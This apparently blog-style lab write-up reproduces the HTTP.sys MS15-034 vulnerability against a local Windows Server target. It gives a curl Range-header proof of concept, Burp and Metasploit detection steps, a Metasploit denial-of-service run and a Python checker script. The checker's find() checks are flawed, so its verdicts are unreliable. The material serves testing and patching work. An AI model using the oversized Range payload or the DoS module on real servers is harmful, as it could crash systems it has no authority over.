CVE-2015-1635(MS15-034)-HTTP.sys远程代码执行复现

一、漏洞描述

HTTP协议栈(HTTP.sys)存在远程代码执行漏洞,是由于HTTP.sys不正确的解析HTTP请求引起的,成功利用此漏洞的攻击者可以执行系统账户上任意代码。
攻击者必须发送一个HTTP请求到受影响的系统去触发这个漏洞,通过修改Windows HTTP栈处理请求更新漏洞地址。

主要存在Windows+IIS的环境下,任何安装了微软IIS 6.0以上的Windows Server 2008 R2/Server 2012/Server 2012 R2以及Windows 7/8/8.1操作系统都受到这个漏洞的影响。

二、本次复现漏洞环境

靶机:Windows Server 2008
攻击机:Kali

三、漏洞验证

方法一:curl语法验证

(1)查看能否访问目标URL
CVE-2015-1635(MS15-034)-HTTP.sys远程代码执行复现_第1张图片

(2)使用curl poc验证

curl http://192.168.208.142/iisstart.htm -H "Host: 192.168.208.142" -H "Range: bytes=0-18446744073709551615"

(3)查看结果
如果出现416和Requested Range Not Satisfiable,则证明存在漏洞,反之,则不存在
CVE-2015-1635(MS15-034)-HTTP.sys远程代码执行复现_第2张图片

方法二:Burpsuite验证

在请求包中添加一行:Range: bytes=0-18446744073709551615
判断方法同上
CVE-2015-1635(MS15-034)-HTTP.sys远程代码执行复现_第3张图片

方法三:使用MSF验证

(1)kali打开msf:msfconsole
CVE-2015-1635(MS15-034)-HTTP.sys远程代码执行复现_第4张图片
(2)在msf中搜索利用模块:search MS15-034search CVE-2015-1635
CVE-2015-1635(MS15-034)-HTTP.sys远程代码执行复现_第5张图片
在这里插入图片描述

(3)选择payload模块,带有sanner的是验证模块,带有dos的是攻击模块:use 1
CVE-2015-1635(MS15-034)-HTTP.sys远程代码执行复现_第6张图片

(4)设置目标IP:set rhosts xxx.xxx.xxx.xxx
注:端口号如果非80,还要修改端口号
CVE-2015-1635(MS15-034)-HTTP.sys远程代码执行复现_第7张图片
出现如下所示表示不存在:
在这里插入图片描述

方法四:python poc脚本

(1)脚本代码

import requests
import sys

try:
    print("正在测试http请求,请稍等...")
    url = "http://" + sys.argv[1]
    req = requests.get(url,timeout=5)
    target_server = req.headers['Server']

    if target_server.find("IIS"):
        payload = {"Range": "bytes=0-18446744073709551615"}
        req2 = requests.get(url, headers=payload)
        #print(req2.text)
        #print(req1.request.headers)  # 输出自定义的头部信息

        if str(req2.content).find("Requested Range Not Satisfiable"):
            print("-------------------存在MS15-034漏洞-------------------")
            print("漏洞URL:"+url)

        else:
            print("Waring:不存在MS15-034漏洞")
            print("如有疑问,请手工测试...")
    else:
        print("-------------------服务器不是IIS-------------------")
except:
    try:
        print("http请求失败,正在测试http请求,请稍等...")
        url2 = "https://" + sys.argv[1]
        req = requests.get(url2, timeout=5)
        target_server = req.headers['Server']

        if target_server.find("IIS"):
            payload = {"Range": "bytes=0-18446744073709551615"}
            req2 = requests.get(url2, headers=payload)
            # print(req2.text)
            # print(req1.request.headers)  # 输出自定义的头部信息

            if str(req2.content).find("Requested Range Not Satisfiable"):
                print("-------------------存在MS15-034漏洞-------------------")
                print("漏洞URL:" + url2)

            else:
                print("Waring:不存在MS15-034漏洞")
                print("如有疑问,请手工测试...")
        else:
            print("-------------------服务器不是IIS-------------------")
        print("-------------------目标无法连接-------------------")
    except:
        print("-------------------服务器不是IIS-------------------")

(2)测试
在这里插入图片描述

四、漏洞攻击

选择之前搜索到的dos模块:use 0
CVE-2015-1635(MS15-034)-HTTP.sys远程代码执行复现_第8张图片
CVE-2015-1635(MS15-034)-HTTP.sys远程代码执行复现_第9张图片

五、漏洞修复

Microsoft已经为此发布了一个安全公告(MS15-034)以及相应补丁:
MS15-034:Vulnerability in HTTP.sys Could Allow Remote Code Execution (3042553)
链接:http://technet.microsoft.com/security/bulletin/MS15-034

你可能感兴趣的:(实战漏洞复现,CVE-2015-1635,MS15-034,HTTP.sys远程执行代码)